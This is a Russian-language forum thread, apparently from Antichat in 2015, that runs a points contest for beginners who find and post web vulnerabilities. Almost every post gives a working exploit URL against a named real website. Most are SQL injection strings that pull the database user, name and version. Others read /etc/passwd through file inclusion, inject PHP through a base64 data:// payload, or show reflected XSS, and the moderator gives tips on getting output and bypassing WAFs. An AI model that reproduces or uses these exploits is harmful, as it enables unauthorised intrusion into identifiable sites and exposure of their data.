PDA

Просмотр полной версии : Конкурс уязвимостей для новичков


faza02
01.06.2015, 18:55
Правила:

Ваша задача найти уязвимости в веб-приложениях.

Каждая уязявимость оценивается в определенное количество баллов и после достижения отметки 20 вы получаете награду в виде репутации (достаточной, чтобы больше не писать в "Песочнице" ).

Также, действует система бонусов. Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов. Обход WAF, нестандартность и уязвимости на крупных ресурсах будут также поощряться.

За плагиат баллы вычитаются, поэтому проверяйте найденные уязвимости в Google (не только на форуме Античат, но вообще по всему поисковику). Запрещено постить уязвимости на сайтах стран СНГ (ru, by, ua).

В посте необходимо указать тип уязвимости, требования и эксплоит (именно в таком формате), например:


Сайт: example.com
Уязвимость: SQL Injection
Эксплоит:

http://example.com/index.php?id=1 UNION SELECT 1,2,3,table_name FROM information_schema.tables

Код уязвимости:

$query = "SELECT news FROM cds WHERE id=".$_GET['id'];



Уязвимости:


SQL Injection (2 балла)

Stored XSS (2 балла)

Reflected XSS (1 балл)

Local File Inclusion (3 балла)

Remote File Inclusion (4 балла)

Remote Code Execution (5 баллов)

XXE (5 баллов)

Arbitary File Read (3 балла)


Для наглядности баллы будут в ручном режиме добавляться в таблицу: https://yarbabin.ru/antichat/

Типы уязвимостей:


Оранжевые (с приложенным исходным кодом уязвимости)

Серые (эксплоит без кода)

dmn75
04.06.2015, 16:51
Буду первым. Если что не так подправьте

Site: dkcity.com

Уязвимость: SQL Injection

Эксплоит:


http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com

Уязвимость: SQL Injection

Эксплоит:


http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7

faza02
04.06.2015, 17:27
↑ (https://antichat.live/posts/3855516/)
Буду первым. Если что не так подправьте
Site: dkcity.com
Уязвимость: SQL Injection
Эксплоит:

http://www.dkcity.com/products.php?uID=999999.9 union all select [t],2,3,4,5,6,7,8,9,10,11,12&cID=&keyword=&page=5

Site: knitty.com
Уязвимость: SQL Injection
Эксплоит:

http://www.knitty.com/banner.php?id=1641' and [t] and '1'='1&url=http://www.stringtheoryyarn.com/home.php?xid=1fd829ff61f9611a535fa8370f36caa7



тулзой крутите? для blind тоже нужен запрос на вывод чего-нибудь. если сможете сделать вывод через еррор-басед, получите больше очков, как за крупный сайт. и, по возможности, пишите в один пост. в таблицу добавил.

P. S. активнее, ребят

BabaDook
04.06.2015, 17:48
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )

faza02
04.06.2015, 17:50
↑ (https://antichat.live/posts/3855537/)
А я не понял, а где уязвимый код ? В этом-то вся сложность.(Для меня )




↑ (https://antichat.live/posts/3854392/)
Если вы приложите уязвимый код к найденной уязвимости, получаете еще 5 баллов


исходники с уязвимостью прибавляют баллы, но можно и без них

dmn75
04.06.2015, 18:30
Да, тулзой кручу.

Сайт: theatreinchicago.com

Уязвимость: SQL Injection

Эксплоит:


http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8


Сайт: tsgconsumer.com

Уязвимость: SQL Injection

Эксплоит:


http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0


Сайт: alicekwartler.com

Уязвимость: SQL Injection

Эксплоит:


http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]


Сайт: athenscine.com

Уязвимость: SQL Injection

Эксплоит:


http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20


Сайт: classifieds.chiangmaicitylife.com

Уязвимость: SQL Injection

Эксплоит:


http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1


Сайт: cstv.collegesports.com

Уязвимость: SQL Injection

Эксплоит:


http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5


Сайт: ctnrecruiting.com

Уязвимость: SQL Injection

Эксплоит:


http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19


Сайт: diarionecochea.com

Уязвимость: SQL Injection

Эксплоит:


http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo


Сайт: dogarchive.kennel-apbt.com

Уязвимость: SQL Injection

Эксплоит:


http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1


Сайт: eu.bosscom.com

Уязвимость: SQL Injection

Эксплоит:


http://eu.bosscom.com/product.asp?id=[t]

Какой именно запрос на вывод нужен?

faza02
04.06.2015, 18:34
↑ (https://antichat.live/posts/3855555/)
Какой именно запрос на вывод нужен?


если blind, то хотя бы substring версии

BigBear
04.06.2015, 18:36
↑ (https://antichat.live/posts/3855559/)
если blind, то хотя бы substring версии


substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.

faza02
04.06.2015, 18:52
↑ (https://antichat.live/posts/3855560/)
substring не интересен. Давайте left(), right(), или mid() хотя бы. Что уж совсем простое.


а разница?

BigBear
04.06.2015, 18:56
↑ (https://antichat.live/posts/3855572/)
а разница?


Для развеивания шаблонного мышления.

faza02
05.06.2015, 12:18
↑ (https://antichat.live/posts/3855555/)
Да, тулзой кручу.
Сайт: theatreinchicago.com
Уязвимость: SQL Injection
Эксплоит:

http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8

Сайт: tsgconsumer.com
Уязвимость: SQL Injection
Эксплоит:

http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0

Сайт: alicekwartler.com
Уязвимость: SQL Injection
Эксплоит:

http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]

Сайт: athenscine.com
Уязвимость: SQL Injection
Эксплоит:

http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20

Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection
Эксплоит:

http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1

Сайт: cstv.collegesports.com
Уязвимость: SQL Injection
Эксплоит:

http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5

Сайт: ctnrecruiting.com
Уязвимость: SQL Injection
Эксплоит:

http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Сайт: diarionecochea.com
Уязвимость: SQL Injection
Эксплоит:

http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo

Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection
Эксплоит:

http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1

Сайт: eu.bosscom.com
Уязвимость: SQL Injection
Эксплоит:

http://eu.bosscom.com/product.asp?id=[t]

Какой именно запрос на вывод нужен?


я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.

Печа
07.06.2015, 19:18
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.

Сайт: isotropix.com

Уязвимость: SQL Injection

Эксплоит:


http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,9 99,8,9,10,11,12,13,14,15,16,17,18

Сайт: judgement-yard.com

Уязвимость: SQL Injection

Эксплоит:


http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%2 01,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75

Сайт: newchristian.com

Уязвимость: SQL Injection

Эксплоит:


http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2, 999

Сайт: patagonianshells.com

Уязвимость: SQL Injection

Эксплоит:


http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4, 999,6--

Сайт: rhodesnow.com

Уязвимость: SQL Injection

Эксплоит:


http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20 ,1,2%20and%20%220%22=%220&lang=english

Сайт: seavernon.com

Уязвимость: SQL Injection

Эксплоит:


http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1

Сайт: watch-clock.com

Уязвимость: SQL Injection

Эксплоит:


http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999

Rypjaer
07.06.2015, 19:24
Сайт: www.justintime.in (http://www.justintime.in)

Уязвимость: SQLi

Эксплоит:


http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%2 9,user%28%29,database%28%29%29,6+--+

Сайт: www.hergolfgame.com (http://www.hergolfgame.com)

Уязвимость: SQLi

Эксплоит:


http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,1 0+--+

Сайт: www.secretslk.com (http://www.secretslk.com)

Уязвимость: SQLi

Эксплоит:


http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r

Сайт: dianaboutiquebd.com

Уязвимость: SQLi

Эксплоит:


http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29+--+

Сайт: www.localfirstaz.com (http://www.localfirstaz.com)

Уязвимость: SQLi

Эксплоит:


http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,databa se%28%29,0x3a,version%28%29%29+--+

faza02
07.06.2015, 20:44
↑ (https://antichat.live/posts/3856497/)
Сайт:
www.justintime.in (http://www.justintime.in)
Уязвимость: SQLi
Эксплоит:

http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%2 9,user%28%29,database%28%29%29,6+--+

Сайт:
www.hergolfgame.com (http://www.hergolfgame.com)
Уязвимость: SQLi
Эксплоит:

http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,1 0+--+

Сайт:
www.secretslk.com (http://www.secretslk.com)
Уязвимость: SQLi
Эксплоит:

http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r

Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:

http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29+--+

Сайт:
www.localfirstaz.com (http://www.localfirstaz.com)
Уязвимость: SQLi
Эксплоит:

http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,databa se%28%29,0x3a,version%28%29%29+--+



добавил в таблицу.


↑ (https://antichat.live/posts/3856494/)
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:

http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18

Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:

http://www.judgement-yard.com/index.php?pageID=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15&detail=log&id=75

Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:

http://newchristian.com/view.php?id=999999.9 union all select 1,2,[t]

Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:

http://patagonianshells.com/index.php?link=home&seccion=999999.9 union all select 1,2,3,4,[t],6--

Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:

http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9" union all select [t],2 and "0"="0&lang=english

Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:

http://www.seavernon.com/index.php?id=22&lg=fr or 1=[t] and 1=1

Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:

http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=[t]



на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод

3nvY
11.06.2015, 21:57
Сайт: hexonline.co.uk

Уязвимость: SQLi

Эксплоит:


http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-

Сайт: fleurlis.com.tw

Уязвимость: SQLi

Эксплоит:


http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a, database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9 +--+-

Сайт: pnelsoncomposer.com

Уязвимость: SQLi

Эксплоит:


http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3+--+-

Сайт: puccimanuli.com

Уязвимость: SQLi

Эксплоит:


http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%2 9,version%28%29%29,3,4,5,6,7,8+--+

Сайт: boutique.rrconcept.com

Уязвимость: SQLi

Эксплоит:


http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x 3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%2 8RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+

semen6192
14.06.2015, 22:16
Сайт: www.cobranet.org/about (http://www.cobranet.org/about).php?id=1

Уязвимость: SQLi

Эксплоит:

http://www.cobranet.org/about.php?id=9999999 union select 1,2,3,version(),5,6 --

Сайт: http://www.raahauges.com/view-news.php?id=8

Уязвимость: SQLi

Эксплоит: http://www.raahauges.com/view-news.php?id=null union select 1,2,@@Version,4,5 --

Печа
15.06.2015, 03:19
Сайт: http://www.yd1688.com

Уязвимость: SQL Injection

Эксплоит:


http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2 ,999,4,5,6,7,8,9,10,11,12,13,14

faza02
15.06.2015, 03:25
↑ (https://antichat.live/posts/3858936/)
Сайт:
http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:

http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2 ,999,4,5,6,7,8,9,10,11,12,13,14



предыдущие поправьте на нормальный вывод.


↑ (https://antichat.live/posts/3857982/)
Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:

http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,da tabase%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-

Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:

http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a, database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9 +--+-

Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:

http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3+--+-

Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:

http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%2 9,version%28%29%29,3,4,5,6,7,8+--+

Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:

http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x 3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%2 8RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+



все, 20 баллов набрано, поздравляю!

Neon2211
15.06.2015, 04:27
Cайт:http://www.cygnethome.com/

Уязвимость:SQLi

Эксплойт:


http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201 ,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 ,54,55,56,57,58,59,60,61,62,63,64,65,66,67--

Сайт:http://www.blcontrol.com/

Уязвимость:SQLi

Эксплойт:


http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20se lect%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0

Сайт:http://gobpo.com/

Уязвимость:SQLi

Эксплойт:


http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%2 0999,2--

Cайт:http://store.schulmerichbells.com/

Уязвимость:SQLi

Эксплойт:


http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20selec t%20999,2,3

Cайт:http://www.immobilien-niederzier.com/

Уязвимость:SQLi

Эксплойт:


http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,999

Сайт:http://www.focus-lighting.com/

Уязвимость:

Эксплойт:


http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%2 01,2,3,4,5,6,7,999,9

faza02
15.06.2015, 13:24
↑ (https://antichat.live/posts/3858940/)
Cайт:
http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:

http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201 ,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53 ,54,55,56,57,58,59,60,61,62,63,64,65,66,67--

Сайт:
http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:

http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20se lect%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0

Сайт:
http://gobpo.com/
Уязвимость:SQLi
Эксплойт:

http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%2 0999,2--

Cайт:
http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:

http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20selec t%20999,2,3

Cайт:
http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,999

Сайт:
http://www.focus-lighting.com/
Уязвимость:
Эксплойт:

http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%2 01,2,3,4,5,6,7,999,9



очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t

BabaDook
15.06.2015, 13:36
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,version()

Автор, скажите пожалуйста версию, и где вывод

Neon2211
15.06.2015, 13:54
↑ (https://antichat.live/posts/3859044/)
очень много повторов, два из них отсюда:
http://pastebin.com/tRpAyh1t


Кстати не одну из уезвимостей не брал на этом сайте http://pastebin.com/

Искал через софт !

kingbeef
15.06.2015, 14:11
↑ (https://antichat.live/posts/3859048/)

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,version()

Автор, скажите пожалуйста версию, и где вывод


Вывод в исходном коде.


http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,44 444444444

Нажимаем ctrl+f и ищем 4444444

Нашли на 473 строке


http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,ve rsion()

выдает нам на 473 строке


var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';

BabaDook
15.06.2015, 15:02
↑ (https://antichat.live/posts/3859070/)
Вывод в исходном коде.

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,44 444444444

Нажимаем ctrl+f и ищем 4444444
Нашли на 473 строке

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%20111111111111111,22222222222,333333333333,ve rsion()

выдает нам на 473 строке

var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';



Вы же не автор. вывод подключаемой картинке срц=вывод . Мне просто иногда кажется что...

Neon2211
15.06.2015, 17:03
Сайт:http://www.cqtailian.com/

Уязвимость:SQLi

Эксплойт:


http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20se lect%20999,2,3,4,5

faza02
15.06.2015, 17:17
↑ (https://antichat.live/posts/3859170/)
Сайт:
http://www.cqtailian.com/
Уязвимость:SQLi
Эксплойт:

http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20se lect%20999,2,3,4,5



а вот тут вывода нет.

semen6192
16.06.2015, 19:40
Сайт: http://jithubhq.microbold.net/tutorials/php/tutorials.php?id=11

Уязвимость: SQLi

Эксплойт: http://jithubhq.microbold.net/tutorials/php/tutorials.php?id=-11 UNION SELECT @@Version,2,3,4 --

artificer
17.06.2015, 21:58
Сайт:http: (http://www.cqtailian.com/)www.brzozo.com (http://www.brzozo.com)

Уязвимость:Local File Reading

Эксплойт:


http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?

faza02
17.06.2015, 22:26
↑ (https://antichat.live/posts/3859920/)
Сайт:
http: (http://www.cqtailian.com/)
www.brzozo.com (http://www.brzozo.com)
Уязвимость:Local File Reading
Эксплойт:

http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?


принимается, однако в гугле уже эта уязвимость есть, а касаемо повторов есть правило

Neon2211
18.06.2015, 00:27
Сайт:www.stateofemergencyltd.com (http://www.stateofemergencyltd.com)

Уязвимость:SQLi

Эксплойт:


http://www.stateofemergencyltd.com/news.php?id=999999.9 union all select 1,[t],3,4,5,6,7


Сайт:www.upani.com (http://www.upani.com)

Уязвимость:SQLi

Эксплойт:


http://www.upani.com/productinfo.php?pid=85' and [t] and '1'='1&cid=5&psid=rajpur-collection-invitation-box

Cайт:www.corpsport.com (http://www.corpsport.com)

Уязвимость:SQLi

Эксплойт:


http://www.corpsport.com/productDetails.php?id=999999.9 union all select 1,[t],3,4,5

Cайт:www.immobilien-niederzier.com (http://www.immobilien-niederzier.com)

Уязвимость:SQLi

Эксплойт:


http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20se lect%201,2,3,[t]

semen6192
18.06.2015, 12:49
Сайт: http://www.karnaticlabrecords.com/artists.php?id=32

Уязвимость: SQLi

Эксплойт:

http://www.karnaticlabrecords.com/a...CAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) (http://www.karnaticlabrecords.com/artists.php?id=-32+OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELEC T%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29 x%20GROUP%20BY%20CONCAT%28MID%28VERSION%28%29,%201 ,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29)

faza02
22.06.2015, 14:04
всем добавил. sqli из паблика не зачтены.

faza02
22.06.2015, 23:06
для тех, кто уже прошел (на данный момент это только @3nvY (https://antichat.live/members/265683/)). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей.

3nvY
24.06.2015, 22:41
Сайт: hfboapps.ucr.edu (http://www.karnaticlabrecords.com/artists.php?id=32)

Уязвимость: LFI

Эксплойт:


http://fboapps.ucr.edu/policies/index.php?path=/etc/passwd

Сайт: www.gamsc.com (http://www.gamsc.com)

Уязвимость: LFI

Эксплойт:


http://www.gamsc.com/index.php?filename=../../../../../../../etc/passwd

Сайт: www.mycklaflon.se (http://www.mycklaflon.se)

Уязвимость: RFI

Эксплойт:


www.mycklaflon.se/index1.asp?page=http://www.vk.com

faza02
25.06.2015, 00:33
↑ (https://antichat.live/posts/3862080/)
Сайт:
www.mycklaflon.se (http://www.mycklaflon.se)
Уязвимость: RFI
Эксплойт:

www.mycklaflon.se/index1.asp?page=http://www.vk.com



не RFI, но IFRAME Injection

semen6192
25.06.2015, 22:53
1)Сайт: http://www.felixfilm.se/film.php?id=77

Уязвимость: SQLi

Эксплойт: http://www.felixfilm.se/film.php?id=-77 UNION SELECT 1,version(),3,user(),5,6,7,8,9,10 --

2)Сайт: http://prontowash.com/usa/location.php?id=2

Уязвимость: SQLi

Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15-- (http://prontowash.com/usa/location.php?id=-2%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9 ,10,11,12,13,14,15--)

3)Сайт: http://www.comtecwash.com/photos.php?id=1

Уязвимость: SQLi

Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10--

4)Сайт: http://odessa-life.od.ua

Уязвимость: XSS

Эксплойт: http://odessa-life.od.ua/gue/search

P.S В поиске: alert('1')

5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news

Уязвимость: SQLi

Эксплойт: http://mapexpert.com.ua/index_ru.php?id=-67+union+select+1,2,version(),4,5,6,7,8,9,10+--+&table=news

P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем alert('antichat.ru')

6)Сайт: http://prokudin-gorskiy.ru

Уязвимость: XSS

Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=alert('antichat.ru')

3nvY
28.06.2015, 19:58
Сайт: www.walkandtrain.com (http://www.walkandtrain.com)

Уязвимость: RFI

Эксплоит:


http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net

Уязвимость: RFI

Эксплоит:


http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.

faza02
28.06.2015, 22:44
↑ (https://antichat.live/posts/3863249/)
Сайт:
www.walkandtrain.com (http://www.walkandtrain.com)
Уязвимость: RFI
Эксплоит:

http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net
Уязвимость: RFI
Эксплоит:

http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.


да тут ничего особенного. просто чтение локальных файлов. в php это readfile, file_get_contents и т. д. никаких особых фишек там нет, разве что некоторые функции поддерживают нуль-байт

3nvY
28.06.2015, 22:57
↑ (https://antichat.live/posts/3863249/)
Сайт:
www.walkandtrain.com (http://www.walkandtrain.com)
Уязвимость: RFI
Эксплоит:

http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net
Уязвимость: RFI
Эксплоит:

http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D



То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий

faza02
28.06.2015, 23:21
↑ (https://antichat.live/posts/3863291/)
То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий


ответ на вопрос. но да, это RFI

3nvY
28.06.2015, 23:59
Значит остались самые трудные из списка: XXE и RCE + надо начинать усилено изучать PHP и SQL. Спасибо что поставили меня на путь праведный , а то так бы и продолжал морально разлагаться и в игрушки играть.

faza02
29.06.2015, 14:03
↑ (https://antichat.live/posts/3862412/)
1)Сайт:
http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт:
http://www.felixfilm.se/film.php?id=-77 UNION SELECT 1,version(),3,user(),5,6,7,8,9,10 --
2)Сайт:
http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт:
http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15-- (http://prontowash.com/usa/location.php?id=-2%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9 ,10,11,12,13,14,15--)
3)Сайт:
http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт:
http://www.comtecwash.com/photos.php?id=-1
UNION SELECT 1,2,3,4,version(),6,7,8,9,10--
4)Сайт:
http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт:
http://odessa-life.od.ua/gue/search
P.S В поиске: alert('1')
5)Сайт:
http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт:
http://mapexpert.com.ua/index_ru.php?id=-67+union+select+1,2,version(),4,5,6,7,8,9,10+--+&table=news
